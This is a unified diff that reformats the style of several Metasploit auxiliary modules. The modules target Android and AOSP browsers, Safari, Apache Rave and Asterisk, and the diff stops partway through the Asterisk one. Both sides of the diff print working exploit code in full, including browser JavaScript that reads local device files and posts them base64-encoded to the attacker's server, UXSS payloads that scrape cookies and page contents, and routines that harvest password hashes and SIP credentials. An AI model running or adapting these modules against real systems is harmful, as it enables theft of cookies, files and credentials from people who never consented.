-    print_good("File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}")
+    print_good("File received: #{(contents.bytesize.to_f / 1000).round(2)}kb #{file}")
    loot_path = store_loot(
      file,
      'application/x-sqlite3',
@@ -75,7 +81,6 @@ class MetasploitModule < Msf::Auxiliary
    print_good("Saved to: #{loot_path}")
  end

-
  def file_urls
    default_urls = [
      'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
@@ -91,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
      default_urls = []
    end

-    default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
+    default_urls + (datastore['ADDITIONAL_FILES'] || '').split(',')
  end

  def exploit_html
@@ -140,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
                    return (c.length < 2) ? 0+c : c;
                  }).join(new String);
                  /*ensures there are no 'not allowed' responses that appear to be valid data*/
-                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') === -1) {
+                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>", "")}') === -1) {
                    top.postMessage({data:hex,url:location.href}, '*');
                  }
                  parent.postMessage(1,'*');
@@ -3,41 +3,47 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report
  include Msf::Exploit::JSObfu

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Android Browser "Open in New Tab" Cookie Theft',
-      'Description' => %q{
-        In Android's stock AOSP Browser application and WebView component, the
-        "open in new tab" functionality allows a file URL to be opened. On
-        versions of Android before 4.4, the path to the sqlite cookie
-        database could be specified. By saving a cookie containing a <script>
-        tag and then loading the sqlite database into the browser as an HTML file,
-        XSS can be achieved inside the cookie file, disclosing *all* cookies
-        (HttpOnly or not) to an attacker.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Discovery of "Open in new tab" bug
-        'joev'          # Cookie theft vector, msf module
-      ],
-      'License'     => MSF_LICENSE,
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
+        'Description' => %q{
+          In Android's stock AOSP Browser application and WebView component, the
+          "open in new tab" functionality allows a file URL to be opened. On
+          versions of Android before 4.4, the path to the sqlite cookie
+          database could be specified. By saving a cookie containing a <script>
+          tag and then loading the sqlite database into the browser as an HTML file,
+          XSS can be achieved inside the cookie file, disclosing *all* cookies
+          (HttpOnly or not) to an attacker.
+        },
+        'Author' => [
+          'Rafay Baloch', # Discovery of "Open in new tab" bug
+          'joev'          # Cookie theft vector, msf module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
          # the patch, released against 4.3 AOSP in February 2014
          ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
          ['URL', 'http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html']
        ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-     register_options([
+    register_options([
      OptString.new('COOKIE_FILE', [
        true,
        'The cookie file (on older 2.x devices this is "webview.db")',
@@ -62,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary

  def process_post(cli, request)
    data = hex2bin(request.body)
-    print_good "Cookies received: #{request.body.length.to_f/1024}kb"
+    print_good "Cookies received: #{request.body.length.to_f / 1024}kb"
    loot_path = store_loot(
      "android.browser.cookies",
      'application/x-sqlite3',
@@ -124,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
    |
  end

-  def cookie_path(file='')
+  def cookie_path(file = '')
    '/data/data/com.android.browser/databases/' + file
  end

@@ -134,6 +140,6 @@ class MetasploitModule < Msf::Auxiliary
  end

  def per_run_token
-    @token ||= Rex::Text.rand_text_alpha(rand(2)+1)
+    @token ||= Rex::Text.rand_text_alpha(rand(2) + 1)
  end
 end
@@ -8,38 +8,46 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Android Content Provider File Disclosure',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Content Provider File Disclosure',
+        'Description' => %q{
          This module exploits a cross-domain issue within the Android web browser to
-        exfiltrate files from a vulnerable device.
-      },
-      'Author'      =>
-        [
-          'Thomas Cannon',   # Original discovery, partial disclsoure
-          'jduck'            # Metasploit module
+          exfiltrate files from a vulnerable device.
+        },
+        'Author' => [
+          'Thomas Cannon', # Original discovery, partial disclsoure
+          'jduck' # Metasploit module
        ],
-      'License'     => MSF_LICENSE,
-      'Actions'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Actions' => [
          [ 'WebServer' ]
        ],
-      'PassiveActions' =>
-        [
+        'PassiveActions' => [
          'WebServer'
        ],
-      'References' =>
-        [
+        'References' => [
          [ 'CVE', '2010-4804' ],
          [ 'URL', 'http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/' ]
        ],
-      'DefaultAction'  => 'WebServer'))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
-        OptString.new('FILES', [ false, "The remote file(s) to steal",
-          '/proc/version,/proc/self/status,/data/system/packages.list' ])
-      ])
+        OptString.new('FILES', [
+          false, "The remote file(s) to steal",
+          '/proc/version,/proc/self/status,/data/system/packages.list'
+        ])
+      ]
+    )
  end

  def on_request_uri(cli, request)
@@ -47,6 +55,7 @@ class MetasploitModule < Msf::Auxiliary
    selected_headers = [ 'user-agent', 'origin', 'referer' ]
    request.headers.each_key { |k|
      next if not selected_headers.include? k.downcase
+
      print_status("#{k}: #{request.headers[k]}")
    }

@@ -55,77 +64,76 @@ class MetasploitModule < Msf::Auxiliary
    # Only GET requests now..
    if request.uri =~ /\.html?$/
      filename = request.uri.split('/').last
-      target_files = datastore['FILES'].split(',').map{ |e|
+      target_files = datastore['FILES'].split(',').map { |e|
        "'%s'" % e
      }.join(',')

      upload_url = get_uri(cli)
-      upload_url << '/' if upload_url[-1,1] != '/'
+      upload_url << '/' if upload_url[-1, 1] != '/'
      upload_url << 'q'

-      html = <<-EOS
-<html>
-<body>
-<script lang=javascript>
-var target_files = Array(#{target_files});
-var results = new Array();
-function addField(form, name, value) {
-  var hf = document.createElement('input');
-  hf.setAttribute('type', 'hidden');
-  hf.setAttribute('name', name);
-  hf.setAttribute('value', value);
-  form.appendChild(hf);
-}
-function uploadFiles(files) {
-  var form = document.createElement('form');
-  form.setAttribute('method', 'POST');
-  form.setAttribute('action', '#{upload_url}');
-  var i = 0;
-  for (var fn in files) {
-    addField(form, 'f'+i, btoa(fn));
-    addField(form, 'd'+i, files[fn]);
-    i += 1;
-  }
-  document.body.appendChild(form);
-  form.submit();
-}
-for (var fn in target_files) {
-  fn = target_files[fn];
-  xh = new XMLHttpRequest();
-  xh.open('GET', fn, false);
-  xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
-  xh.send();
-}
-uploadFiles(results);
-</script>
-</body>
-</html>
-EOS
+      html = <<~EOS
+        <html>
+        <body>
+        <script lang=javascript>
+        var target_files = Array(#{target_files});
+        var results = new Array();
+        function addField(form, name, value) {
+          var hf = document.createElement('input');
+          hf.setAttribute('type', 'hidden');
+          hf.setAttribute('name', name);
+          hf.setAttribute('value', value);
+          form.appendChild(hf);
+        }
+        function uploadFiles(files) {
+          var form = document.createElement('form');
+          form.setAttribute('method', 'POST');
+          form.setAttribute('action', '#{upload_url}');
+          var i = 0;
+          for (var fn in files) {
+            addField(form, 'f'+i, btoa(fn));
+            addField(form, 'd'+i, files[fn]);
+            i += 1;
+          }
+          document.body.appendChild(form);
+          form.submit();
+        }
+        for (var fn in target_files) {
+          fn = target_files[fn];
+          xh = new XMLHttpRequest();
+          xh.open('GET', fn, false);
+          xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
+          xh.send();
+        }
+        uploadFiles(results);
+        </script>
+        </body>
+        </html>
+      EOS

      print_status("Sending payload HTML ...")
      send_response_html(cli, html,
-        {
-          'Cache-Control' => 'public',
-          'Content-Description' => 'File Transfer',
-          'Content-Disposition' => "attachment; filename=#{filename}",
-          'Content-Transfer-Encoding' => 'binary',
-          'Content-Type' => 'text/html'
-        })
-
+                         {
+                           'Cache-Control' => 'public',
+                           'Content-Description' => 'File Transfer',
+                           'Content-Disposition' => "attachment; filename=#{filename}",
+                           'Content-Transfer-Encoding' => 'binary',
+                           'Content-Type' => 'text/html'
+                         })

    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))

-      html = <<-EOS
-<html>
-<body>
-<script lang=javascript>
-setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
-setTimeout("document.location = '#{payload_fn}.html';", 500);
-</script>
-</body>
-</html>
-EOS
+      html = <<~EOS
+        <html>
+        <body>
+        <script lang=javascript>
+        setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
+        setTimeout("document.location = '#{payload_fn}.html';", 500);
+        </script>
+        </body>
+        </html>
+      EOS

      print_status("Sending initial HTML ...")
      send_response_html(cli, html)
@@ -134,7 +142,6 @@ EOS
  end

  def process_post(cli, request)
-
    results = {}

    if request and request.body
@@ -143,9 +150,9 @@ EOS
        if parts.length != 2
          print_error("Weird, we got a var that doesn't contain an equals: #{parts.inspect}")
        else
-          fln,fld = parts
+          fln, fld = parts
          fld = Rex::Text.uri_decode(fld).unpack('m').first
-          start = fln.slice!(0,1)
+          start = fln.slice!(0, 1)
          if start == "f"
            results[fln] ||= {}
            results[fln][:filename] = fld
@@ -165,7 +172,7 @@ EOS

      fn.gsub!(/[\/\\]/, '.')
      fn.gsub!(/^\./, '')
-      store_loot('android.fs.'+fn, 'application/octet-stream', cli.peerhost, data, fn)
+      store_loot('android.fs.' + fn, 'application/octet-stream', cli.peerhost, data, fn)
    }

    send_response_html(cli, "thx")
@@ -9,37 +9,45 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android Open Source Platform (AOSP) Browser UXSS',
-      'Description'    => %q{
-        This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
-        all versions of Android's open source stock browser before 4.4, and Android apps running
-        on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
-        to scrape both cookie data and page contents from a vulnerable browser window.
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
+        'Description' => %q{
+          This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
+          all versions of Android's open source stock browser before 4.4, and Android apps running
+          on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
+          to scrape both cookie data and page contents from a vulnerable browser window.

-        Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
+          Target URLs that use X-Frame-Options can not be exploited with this vulnerability.

-        Some sample UXSS scripts are provided in data/exploits/uxss.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Original discovery, disclosure
-        'joev'          # Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [
-        [ 'WebServer' ]
-      ],
-      'PassiveActions' => [
-        'WebServer'
-      ],
-      'References' => [
-        [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
-        [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
-        [ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
-      ],
-      'DefaultAction'  => 'WebServer',
-      'DisclosureDate' => '2014-10-04'
-    ))
+          Some sample UXSS scripts are provided in data/exploits/uxss.
+        },
+        'Author' => [
+          'Rafay Baloch', # Original discovery, disclosure
+          'joev'          # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [ 'WebServer' ]
+        ],
+        'PassiveActions' => [
+          'WebServer'
+        ],
+        'References' => [
+          [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
+          [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
+          [ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
+        ],
+        'DefaultAction' => 'WebServer',
+        'DisclosureDate' => '2014-10-04',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('TARGET_URLS', [
@@ -67,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
      collect_data(request)
      send_response_html(cli, '')
    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
      domains = datastore['TARGET_URLS'].split(',')

      script = js_obfuscate <<-EOS
@@ -81,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
              'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
              '));}void(0);';
-            obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
+            obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12) + 5)}';
          };
          document.body.appendChild(obj);
        });
@@ -8,40 +8,48 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android Open Source Platform (AOSP) Browser UXSS',
-      'Description'    => %q{
-        This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
-        all versions of Android's open source stock browser before 4.4, and Android apps running
-        on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
-        to scrape both cookie data and page contents from a vulnerable browser window.
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
+        'Description' => %q{
+          This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
+          all versions of Android's open source stock browser before 4.4, and Android apps running
+          on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
+          to scrape both cookie data and page contents from a vulnerable browser window.

-        If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
-        which will cause a popup window to be used. This requires a click from the user
-        and is much less stealthy, but is generally harmless-looking.
+          If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
+          which will cause a popup window to be used. This requires a click from the user
+          and is much less stealthy, but is generally harmless-looking.

-        By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
-        module also allows running arbitrary javascript in the context of the targeted URL.
-        Some sample UXSS scripts are provided in data/exploits/uxss.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Original discovery, disclosure
-        'joev'          # Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [
-        [ 'WebServer' ]
-      ],
-      'PassiveActions' => [
-        'WebServer'
-      ],
-      'References' => [
-        [ 'URL', 'http://1337day.com/exploit/description/22581' ],
-        [ 'OSVDB', '110664' ],
-        [ 'CVE', '2014-6041' ]
-      ],
-      'DefaultAction'  => 'WebServer'
-    ))
+          By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
+          module also allows running arbitrary javascript in the context of the targeted URL.
+          Some sample UXSS scripts are provided in data/exploits/uxss.
+        },
+        'Author' => [
+          'Rafay Baloch', # Original discovery, disclosure
+          'joev'          # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [ 'WebServer' ]
+        ],
+        'PassiveActions' => [
+          'WebServer'
+        ],
+        'References' => [
+          [ 'URL', 'http://1337day.com/exploit/description/22581' ],
+          [ 'OSVDB', '110664' ],
+          [ 'CVE', '2014-6041' ]
+        ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('TARGET_URLS', [
@@ -79,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
      collect_data(request)
      send_response_html(cli, '')
    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
      domains = datastore['TARGET_URLS'].split(',')

      html = <<-EOS
@@ -8,30 +8,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Rave User Information Disclosure',
-      'Description'    => %q{
-        This module exploits an information disclosure in Apache Rave 0.20 and prior. The
-        vulnerability exists in the RPC API, which allows any authenticated user to
-        disclose information about all the users, including their password hashes. In order
-        to authenticate, the user can provide his own credentials. Also the default users
-        installed with Apache Rave 0.20 will be tried automatically. This module has been
-        successfully tested on Apache Rave 0.20.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Rave User Information Disclosure',
+        'Description' => %q{
+          This module exploits an information disclosure in Apache Rave 0.20 and prior. The
+          vulnerability exists in the RPC API, which allows any authenticated user to
+          disclose information about all the users, including their password hashes. In order
+          to authenticate, the user can provide his own credentials. Also the default users
+          installed with Apache Rave 0.20 will be tried automatically. This module has been
+          successfully tested on Apache Rave 0.20.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Andreas Guth', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2013-1814' ],
          [ 'OSVDB', '91235' ],
          [ 'BID', '58455' ],
          [ 'EDB', '24744']
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -39,7 +45,8 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
        OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
        OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
-      ])
+      ]
+    )
  end

  def post_auth?
@@ -50,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.to_s, "j_spring_security_check")

    res = send_request_cgi({
-      'uri'      => uri,
-      'method'   => 'POST',
+      'uri' => uri,
+      'method' => 'POST',
      'vars_post' => {
        'j_password' => username,
        'j_username' => password
@@ -69,8 +76,8 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")

    res = send_request_cgi({
-      'uri'      => uri,
-      'method'   => 'GET',
+      'uri' => uri,
+      'method' => 'GET',
      'vars_get' => {
        'offset' => "#{offset}"
      },
@@ -82,7 +89,6 @@ class MetasploitModule < Msf::Auxiliary
    else
      return nil
    end
-
  end

  def setup
@@ -130,20 +136,18 @@ class MetasploitModule < Msf::Auxiliary
    create_credential_login(login_data)
  end

-
  def run
-
    print_status("#{rhost}:#{rport} - Fingerprinting...")
    res = send_request_cgi({
-      'uri'      => normalize_uri(target_uri.to_s, "login"),
-      'method'   => 'GET',
+      'uri' => normalize_uri(target_uri.to_s, "login"),
+      'method' => 'GET',
    })

    if not res
      print_error("#{rhost}:#{rport} - No response, aborting...")
      return
    elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
-      version =$1
+      version = $1
      if version <= "0.20"
        print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
      else
@@ -229,6 +233,5 @@ class MetasploitModule < Msf::Auxiliary
      end

    end
-
  end
 end
@@ -3,38 +3,45 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
-      'Description' => %q{
-        A vulnerability exists in versions of OSX, iOS, and Windows Safari released
-        before April 8, 2015 that allows the non-HTTPOnly cookies of any
-        domain to be stolen.
-      },
-      'License'     => MSF_LICENSE,
-      'Author'      => [
-        'Jouko Pynnonen', # Initial discovery and disclosure
-        'joev',           # msf module
-      ],
-      'References'  => [
-        [ 'CVE', '2015-1126' ],
-        [ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
-      ],
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer',
-      'DisclosureDate' => '2015-04-08'
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
+        'Description' => %q{
+          A vulnerability exists in versions of OSX, iOS, and Windows Safari released
+          before April 8, 2015 that allows the non-HTTPOnly cookies of any
+          domain to be stolen.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jouko Pynnonen', # Initial discovery and disclosure
+          'joev',           # msf module
+        ],
+        'References' => [
+          [ 'CVE', '2015-1126' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
+        ],
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'DisclosureDate' => '2015-04-08',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('URIPATH', [false, 'The URI to use for this exploit (default is random)']),
-      OptPort.new('SRVPORT',   [true, 'The local port to use for the FTP server', 5555 ]),
-      OptPort.new('HTTPPORT',  [true, 'The HTTP server port', 8080]),
+      OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
+      OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
      OptString.new('TARGET_DOMAINS', [
        true,
        'The comma-separated list of domains to steal non-HTTPOnly cookies from.',
@@ -43,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
    ])
  end

-
  #
  # Start the FTP and HTTP server
  #
@@ -54,12 +60,11 @@ class MetasploitModule < Msf::Auxiliary
    @http_service.wait
  end

-
  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
-  def start_http(opts={})
+  def start_http(opts = {})
    # Ensture all dependencies are present before initializing HTTP
    use_zlib

@@ -74,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
-      'Comm'       => comm
+      'Comm' => comm
    }.update(opts)

    # Start a new HTTP server
@@ -84,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
      opts['ServerHost'],
      datastore['SSL'],
      {
-        'Msf'        => framework,
+        'Msf' => framework,
        'MsfExploit' => self,
      },
      opts['Comm'],
@@ -97,8 +102,8 @@ class MetasploitModule < Msf::Auxiliary
    # provided.
    uopts = {
      'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
+        on_request_uri(cli, req)
+      },
      'Path' => resource_uri
    }.update(opts['Uri'] || {})

@@ -117,10 +122,10 @@ class MetasploitModule < Msf::Auxiliary
  #
  # Lookup the right address for the client
  #
-  def lookup_lhost(c=nil)
+  def lookup_lhost(c = nil)
    # Get the source address
    if datastore['SRVHOST'] == '0.0.0.0'
-      Rex::Socket.source_address( c || '50.50.50.50')
+      Rex::Socket.source_address(c || '50.50.50.50')
    else
      datastore['SRVHOST']
    end
@@ -162,7 +167,6 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
  #
  # Ensures that gzip can be used.  If not, an exception is generated.  The
  # exception is only raised if the DisableGzip advanced option has not been
@@ -174,19 +178,17 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    return @uri_path if @uri_path

-    @uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
+    @uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
    @uri_path = '/' + @uri_path if @uri_path !~ /^\//
    @uri_path
  end

-
  #
  # Handle HTTP requests and responses
  #
@@ -228,7 +230,7 @@ class MetasploitModule < Msf::Auxiliary
  #
  # Create an HTTP response and then send it
  #
-  def send_response(cli, code, message='OK', html='')
+  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'text/html'
@@ -12,28 +12,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Mac OS X Safari .webarchive File Format UXSS',
-      'Description'    => %q{
-        Generates a .webarchive file for Mac OS X Safari that will attempt to
-        inject cross-domain Javascript (UXSS), silently install a browser
-        extension, collect user information, steal the cookie database,
-        and steal arbitrary local files.
+    super(
+      update_info(
+        info,
+        'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
+        'Description' => %q{
+          Generates a .webarchive file for Mac OS X Safari that will attempt to
+          inject cross-domain Javascript (UXSS), silently install a browser
+          extension, collect user information, steal the cookie database,
+          and steal arbitrary local files.

-        When opened on the target machine the webarchive file must not have the
-        quarantine attribute set, as this forces the webarchive to execute in a
-        sandbox.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'joev',
-      'References'     =>
-        [
+          When opened on the target machine the webarchive file must not have the
+          quarantine attribute set, as this forces the webarchive to execute in a
+          sandbox.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'joev',
+        'References' => [
          ['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
        ],
-      'DisclosureDate' => '2013-02-22',
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer'))
+        'DisclosureDate' => '2013-02-22',
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

  def run
@@ -71,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
  # @return [String] filename where we are storing the data
  def record_data(data, cli)
    if data.is_a? Hash
-      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
    end
    store_loot(
      file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
@@ -100,5 +108,4 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
 end
@@ -8,21 +8,29 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Asterisk Gather Credentials',
-      'Description' => %q{
-        This module retrieves SIP and IAX2 user extensions and credentials from
-        Asterisk Call Manager service. Valid manager credentials are required.
-      },
-      'Author'      => 'bcoles',
-      'References'  =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Asterisk Gather Credentials',
+        'Description' => %q{
+          This module retrieves SIP and IAX2 user extensions and credentials from
+          Asterisk Call Manager service. Valid manager credentials are required.
+        },
+        'Author' => 'bcoles',
+        'References' => [
          ['URL', 'http://www.asterisk.name/sip1.html'],
          ['URL', 'http://www.asterisk.name/iax2.html'],
          ['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],
          ['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']
        ],
-      'License'     => MSF_LICENSE))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
    register_options [
      Opt::RPORT(5038),
      OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),
@@ -59,17 +67,19 @@ class MetasploitModule < Msf::Auxiliary

    print_status "Found #{@users.length} users"

-    cred_table = Rex::Text::Table.new 'Header'  => 'Asterisk User Credentials',
